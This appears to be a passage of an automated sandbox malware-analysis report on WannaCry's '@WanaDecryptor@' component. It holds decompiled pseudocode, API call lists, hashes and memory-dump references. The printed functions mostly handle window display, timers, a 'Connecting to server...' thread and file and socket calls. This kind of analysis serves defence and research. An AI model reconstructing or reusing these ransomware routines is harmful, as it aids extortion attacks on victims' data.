                                  • GetSysColor.USER32(00000012), ref: 0040862B
                                  • GetSysColor.USER32(00000002), ref: 00408632
                                  • KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                  • GetSysColor.USER32(0000001B), ref: 0040865C
                                  • #6140.MFC42(00000002,000000FF), ref: 00408667
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Color$#341#567#6140CallbackDispatcherUser
                                  • String ID:
                                  • API String ID: 2603677082-0
                                  • Opcode ID: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                  • Instruction ID: 8505b43e8b24dba0e9a20122b4cf5018a120a2575fdff98832e5101b57525ea5
                                  • Opcode Fuzzy Hash: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                  • Instruction Fuzzy Hash: 7D2159B0900B449FD320DF2AC985B96FBE4FF84B14F504A2FE19687791D7B9A844CB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040B620(WCHAR* _a4, struct HWND__* _a8) {
                                  				struct HWND__* _t4;
                                  				struct HWND__* _t15;
                                  
                                  				_t4 = FindWindowW(0, _a4); // executed
                                  				_t15 = _t4;
                                  				if(_t15 != 0) {
                                  					ShowWindow(_t15, 5); // executed
                                  					SetWindowPos(_t15, 0xffffffff, 0, 0, 0, 0, 0x43);
                                  					SetWindowPos(_t15, 0xfffffffe, 0, 0, 0, 0, 0x43);
                                  					SetForegroundWindow(_t15); // executed
                                  					SetFocus(_t15);
                                  					SetActiveWindow(_t15);
                                  					BringWindowToTop(_t15);
                                  					_t4 = _a8;
                                  					if(_t4 != 0) {
                                  						ExitProcess(0);
                                  					}
                                  				}
                                  				return _t4;
                                  			}






                                  APIs
                                  • FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                  • ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                  • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                  • SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                  • KiUserCallbackDispatcher.NTDLL(00000000), ref: 0040B663
                                  • SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                  • SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                  • BringWindowToTop.USER32(00000000), ref: 0040B678
                                  • ExitProcess.KERNEL32 ref: 0040B689
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Window$ActiveBringCallbackDispatcherExitFindFocusProcessShowUser
                                  • String ID:
                                  • API String ID: 3379167612-0
                                  • Opcode ID: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                  • Instruction ID: 32f88169c1f0d7c0e12a36757c7a64a26434f73f58f3758d5628eaed19e7f987
                                  • Opcode Fuzzy Hash: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                  • Instruction Fuzzy Hash: 66F0F431245A21F7E2315B54AC0DFDF3655DFC5B21F214610F715791D4CB6455018AAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E00401140() {
                                  				intOrPtr _v4;
                                  				void* _t16;
                                  				void* _t17;
                                  				struct HWND__* _t18;
                                  				void* _t23;
                                  				intOrPtr _t24;
                                  
                                  				_t23 = _t17;
                                  				L00412CB0();
                                  				SendMessageA( *(_t23 + 0x80), 0x404, 1, 0);
                                  				_t18 =  *(_t23 + 0x80);
                                  				SendMessageA(_t18, 0x401, 0, 0x280000);
                                  				_push(_t18);
                                  				 *((intOrPtr*)(_t23 + 0xb0)) = 0x1e;
                                  				_v4 = _t24;
                                  				L00412CAA();
                                  				E00401970("Connecting to server...");
                                  				 *(_t23 + 0xa8) = 0;
                                  				SetTimer( *(_t23 + 0x20), 0x3e9, 0x3e8, 0); // executed
                                  				if( *((intOrPtr*)(_t23 + 0xa0)) != 0) {
                                  					_t16 = CreateThread(0, 0, E004012D0, _t23, 0, 0); // executed
                                  					 *(_t23 + 0xac) = _t16;
                                  				}
                                  				return 1;
                                  			}










                                  APIs
                                  • #4710.MFC42 ref: 00401145
                                  • SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00401160
                                  • SendMessageA.USER32(?,00000401,00000000,00280000), ref: 00401175
                                  • #537.MFC42(Connecting to server...), ref: 0040118D
                                    • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                    • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                    • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                  • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004011B3
                                  • CreateThread.KERNELBASE(00000000,00000000,Function_000012D0,?,00000000,00000000), ref: 004011D1
                                  Strings
                                  • Connecting to server..., xrefs: 00401188
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#3092#4710#537#6199#800CreateThreadTimer
                                  • String ID: Connecting to server...
                                  • API String ID: 3305248171-1849848738
                                  • Opcode ID: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                  • Instruction ID: 074e0af6858d04fd3a88c2e6ba563778cf6a67133e9310fa302bc50ac74eac6c
                                  • Opcode Fuzzy Hash: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                  • Instruction Fuzzy Hash: 480175B0390700BBE2305B66CC46F8BB694AF84B50F10851EF349AA2D0CAF474018B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00401220(void* __ecx, long _a4) {
                                  				long _t11;
                                  				void* _t26;
                                  
                                  				_t11 = _a4;
                                  				_t26 = __ecx;
                                  				if(_t11 != 0x3e9) {
                                  					L8:
                                  					L00412CBC();
                                  					return _t11;
                                  				}
                                  				if( *((intOrPtr*)(__ecx + 0xa8)) != 0) {
                                  					SendMessageA( *(__ecx + 0x80), 0x402, 0x28, 0);
                                  					KillTimer( *(_t26 + 0x20), 0x3e9);
                                  					L00412B66();
                                  				}
                                  				if(SendMessageA( *(_t26 + 0x80), 0x408, 0, 0) <  *((intOrPtr*)(_t26 + 0xb0))) {
                                  					SendMessageA( *(_t26 + 0x80), 0x405, 0, 0); // executed
                                  				}
                                  				_t11 =  *(_t26 + 0xa0);
                                  				if(_t11 == 0) {
                                  					_t11 = SendMessageA( *(_t26 + 0x80), 0x408, 0, 0);
                                  					if(_t11 == 0xf) {
                                  						 *((intOrPtr*)(_t26 + 0xa8)) = 0xffffffff;
                                  					}
                                  				}
                                  				goto L8;
                                  			}






                                  APIs
                                  • SendMessageA.USER32(?,00000402,00000028,00000000), ref: 00401253
                                  • KillTimer.USER32(?,000003E9), ref: 0040125E
                                  • #4853.MFC42 ref: 00401266
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 0040127B
                                  • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00401295
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 004012B1
                                  • #2379.MFC42 ref: 004012C4
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#2379#4853KillTimer
                                  • String ID:
                                  • API String ID: 178170520-0
                                  • Opcode ID: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                  • Instruction ID: aacaf11b8525f3fa08346ebc997e4185e7a595c9bc7dc659aa73715d177cc548
                                  • Opcode Fuzzy Hash: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                  • Instruction Fuzzy Hash: FD114475340B00ABD6709A74CD41F6BB3D4BB94B10F20892DF395FB2D0DAB4B8068B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: fclose$fopenfreadfwrite
                                  • String ID: c.wnry
                                  • API String ID: 2140422903-3240288721
                                  • Opcode ID: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                  • Instruction ID: f5186b7865cb40674a519f70d39de74d6a09c830656aa5640d665e45194f203f
                                  • Opcode Fuzzy Hash: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                  • Instruction Fuzzy Hash: 0DF0FC31746310EBD3209B19BD09BD77A56DFC0721F450436FC0ED63A4E2799946899E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E00406CF0(void* __ecx, intOrPtr _a4) {
                                  				int _v12;
                                  				intOrPtr _v20;
                                  				void* _v28;
                                  				char _v36;
                                  				intOrPtr _v40;
                                  				void* _v48;
                                  				struct HWND__* _t16;
                                  				void* _t21;
                                  				void* _t34;
                                  				intOrPtr _t36;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413E78);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t36;
                                  				_t34 = __ecx;
                                  				_t16 = __ecx + 0x4c0;
                                  				if(_t16 != 0) {
                                  					_t16 =  *(_t16 + 0x20);
                                  				}
                                  				SendMessageA(_t16, 0x445, 0, 0x4000000);
                                  				_push(0);
                                  				_push(_a4);
                                  				L00412F44(); // executed
                                  				_v12 = 0;
                                  				_v48 =  &_v36;
                                  				_v40 = E00406DA0;
                                  				SendMessageA( *(_t34 + 0x4e0), 0x449, 2,  &_v48); // executed
                                  				L00412F3E();
                                  				_t21 = E00406DC0(_t34);
                                  				_v12 = 0xffffffff;
                                  				L00412F38();
                                  				 *[fs:0x0] = _v20;
                                  				return _t21;
                                  			}














                                  APIs
                                  • SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
                                  • #353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,765920C0), ref: 00406D39
                                  • SendMessageA.USER32 ref: 00406D69
                                  • #1979.MFC42 ref: 00406D6F
                                  • #665.MFC42 ref: 00406D87
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#1979#353#665
                                  • String ID:
                                  • API String ID: 3794212480-0
                                  • Opcode ID: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                  • Instruction ID: 970bbd2b9484f858b006173e4a833a93101fbe0026f1fdcd253c6fb41473c1ec
                                  • Opcode Fuzzy Hash: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                  • Instruction Fuzzy Hash: EA1170B1244701AFD210EF15C942F9BB7E4BF94B14F504A1EF156A72C0C7B8A905CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00407DB0(void* __eflags) {
                                  				intOrPtr _v4;
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				void* _v100;
                                  				char _v196;
                                  				void* _t14;
                                  				intOrPtr _t16;
                                  				intOrPtr _t22;
                                  				void* _t23;
                                  				intOrPtr* _t24;
                                  				intOrPtr _t26;
                                  				void* _t28;
                                  
                                  				 *[fs:0x0] = _t26;
                                  				E00401000( &_v196, 0);
                                  				_t24 = __imp__time;
                                  				_v8 = 0;
                                  				_t14 =  *_t24(0, _t23,  *[fs:0x0], E00413FA6, 0xffffffff);
                                  				_t22 =  *0x4218a0; // 0x0
                                  				_t28 = _t26 - 0xb8 + 4;
                                  				if(_t14 - _t22 < 0x12c) {
                                  					_v36 = 0;
                                  				}
                                  				_v32 = 0;
                                  				L00412B72(); // executed
                                  				_t16 = _v28;
                                  				if(_t16 >= 0) {
                                  					_t16 =  *_t24(0);
                                  					_t28 = _t28 + 4;
                                  					 *0x4218a0 = _t16;
                                  				}
                                  				 *0x4218a4 =  *0x4218a4 + 1;
                                  				_v4 = 1;
                                  				L00412C9E();
                                  				_v4 = 0xffffffff;
                                  				L00412C86();
                                  				 *[fs:0x0] = _v12;
                                  				return _t16;
                                  			}



















                                  APIs
                                    • Part of subcall function 00401000: #324.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401029
                                    • Part of subcall function 00401000: #567.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401039
                                  • time.MSVCRT ref: 00407DEA
                                  • #2514.MFC42 ref: 00407E18
                                  • time.MSVCRT ref: 00407E2A
                                  • #765.MFC42 ref: 00407E49
                                  • #641.MFC42 ref: 00407E5D
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: time$#2514#324#567#641#765
                                  • String ID:
                                  • API String ID: 3372871541-0
                                  • Opcode ID: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                  • Instruction ID: 27345a9b2c1eb8b6f7bb2a745056f56b64ece2280f016bc8de7da71c9126f67a
                                  • Opcode Fuzzy Hash: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                  • Instruction Fuzzy Hash: 4C11AD70A097809FE320EF24CA41BDA77E0BB94714F40462EE589872D0EB786445CB97
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: closesocketsendsetsockoptshutdown
                                  • String ID:
                                  • API String ID: 4063721217-0
                                  • Opcode ID: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                  • Instruction ID: 511c5ca045328faec3d78f5435f76df0282562355462c5d2c83a81ecee0c9610
                                  • Opcode Fuzzy Hash: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                  • Instruction Fuzzy Hash: 9D014075200B40ABD3208B28C849B97B7A5AF89721F808B2CF6A9962D0D7B4A4088795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 55%
                                  			E00401970(intOrPtr _a4) {
                                  				intOrPtr _v4;
                                  				intOrPtr _v12;
                                  				intOrPtr _t6;
                                  				intOrPtr* _t10;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004134D8);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t10;
                                  				_t6 = _a4;
                                  				_v4 = 0;
                                  				_push(_t6);
                                  				_push(0x406);
                                  				L00412CE6();
                                  				L00412CE0(); // executed
                                  				_v12 = 0xffffffff;
                                  				L00412CC2();
                                  				 *[fs:0x0] =  *_t10;
                                  				return _t6;
                                  			}








                                  APIs
                                  • #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                  • #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                  • #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #3092#6199#800
                                  • String ID:
                                  • API String ID: 3924541682-0
                                  • Opcode ID: ecd91130295bb8af0247287c9129cb1c8204aaf667e5a628a3bd86e63acab10a
                                  • Instruction ID: e5ca7d8525ee00d79fb0b85b86dd9e556083ecc507c08eb16956c090e8f9caf4
                                  • Opcode Fuzzy Hash: ecd91130295bb8af0247287c9129cb1c8204aaf667e5a628a3bd86e63acab10a
                                  • Instruction Fuzzy Hash: 9DE04FB5248781ABD310DF14C942B6EBBA4FB94B20F208F1DF665937C0D77C9454CA66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 50%
                                  			E004043E0(void* __ecx) {
                                  				void* _t3;
                                  
                                  				_push(1);
                                  				_push(0x100);
                                  				_push(0);
                                  				L00412DDC();
                                  				_t3 = __ecx + 0x40;
                                  				_push(_t3); // executed
                                  				L00412DD6(); // executed
                                  				 *((char*)(__ecx + 0x5a)) = 0;
                                  				L00412C14();
                                  				return _t3;
                                  			}





                                  APIs
                                  • #4284.MFC42(00000000,00000100,00000001), ref: 004043EC
                                  • #3874.MFC42(?,00000000,00000100,00000001), ref: 004043F7
                                  • #5277.MFC42 ref: 00404402
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #3874#4284#5277
                                  • String ID:
                                  • API String ID: 1717392697-0
                                  • Opcode ID: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
                                  • Instruction ID: 168dd717f23fd29799672b21daad70d98dc1c3a6295a550393a3fd33bd33aa1c
                                  • Opcode Fuzzy Hash: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
                                  • Instruction Fuzzy Hash: B1D012303487645AE974B266BA0BBDB5A999B45B18F04044FF2459F2C1D9D858D083E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 28%
                                  			E004133E6(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
                                  
                                  				_t1 =  &_a16; // 0x413236
                                  				_push( *_t1);
                                  				_push(_a12);
                                  				_push(_a8);
                                  				_push(_a4);
                                  				L0041343E(); // executed
                                  				return __eax;
                                  			}

                                  APIs
                                  • #1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1576
                                  • String ID: 62A
                                  • API String ID: 1976119259-856450375
                                  • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                  • Instruction ID: 1789da96975510f8b15a36ac976bc3503c656fbbd280c19756f03076dd05f2b6
                                  • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                  • Instruction Fuzzy Hash: AFB008360193D6ABCB12DE91890196ABAA2BB98305F484C1DB2A50146187668568AB16
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 46%
                                  			E00405860(void* __ecx, signed int _a4) {
                                  				struct tagRECT _v16;
                                  				signed int _t15;
                                  				signed int _t23;
                                  				void* _t24;
                                  
                                  				_t24 = __ecx;
                                  				_t23 = _a4;
                                  				if( *(__ecx + 0x74) == 0) {
                                  					 *(__ecx + 0x74) = _t23;
                                  				}
                                  				GetClientRect( *(_t24 + 0x20),  &_v16);
                                  				_push(2);
                                  				_push(_v16.bottom - _v16.top);
                                  				_t15 = ( *((intOrPtr*)(_t24 + 0x68)) +  *((intOrPtr*)(_t24 + 0x60))) * _t23;
                                  				_push(_t15);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				L00412E60(); // executed
                                  				return _t15;
                                  			}

                                  APIs
                                  • GetClientRect.USER32(?,?), ref: 0040587E
                                  • #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 004058A5
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #6197ClientRect
                                  • String ID:
                                  • API String ID: 2663203813-0
                                  • Opcode ID: 08365d4a6b4c4d135f9bc492184b9046fd35a4d0fa1764fa72772bf707b20851
                                  • Instruction ID: 7afc014e2c7f757f2c38916e7ea6268c43ad9ab86f90261082180cf4c9fc0c78
                                  • Opcode Fuzzy Hash: 08365d4a6b4c4d135f9bc492184b9046fd35a4d0fa1764fa72772bf707b20851
                                  • Instruction Fuzzy Hash: 56F03075740601AFE324DE19CD56F67F7E9EBD4B00F00891EB985D7390D670F8048695
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 46%
                                  			E004058C0(void* __ecx, signed int _a4) {
                                  				struct tagRECT _v16;
                                  				void* _t15;
                                  				signed int _t23;
                                  				void* _t24;
                                  
                                  				_t24 = __ecx;
                                  				_t23 = _a4;
                                  				if( *(__ecx + 0x70) == 0) {
                                  					 *(__ecx + 0x70) = _t23;
                                  				}
                                  				GetClientRect( *(_t24 + 0x20),  &_v16);
                                  				_push(2);
                                  				_t15 = _v16.right - _v16.left;
                                  				_push(( *((intOrPtr*)(_t24 + 0x6c)) +  *((intOrPtr*)(_t24 + 0x64))) * _t23);
                                  				_push(_t15);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				L00412E60(); // executed
                                  				return _t15;
                                  			}

                                  APIs
                                  • GetClientRect.USER32(?,?), ref: 004058DE
                                  • #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 00405905
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
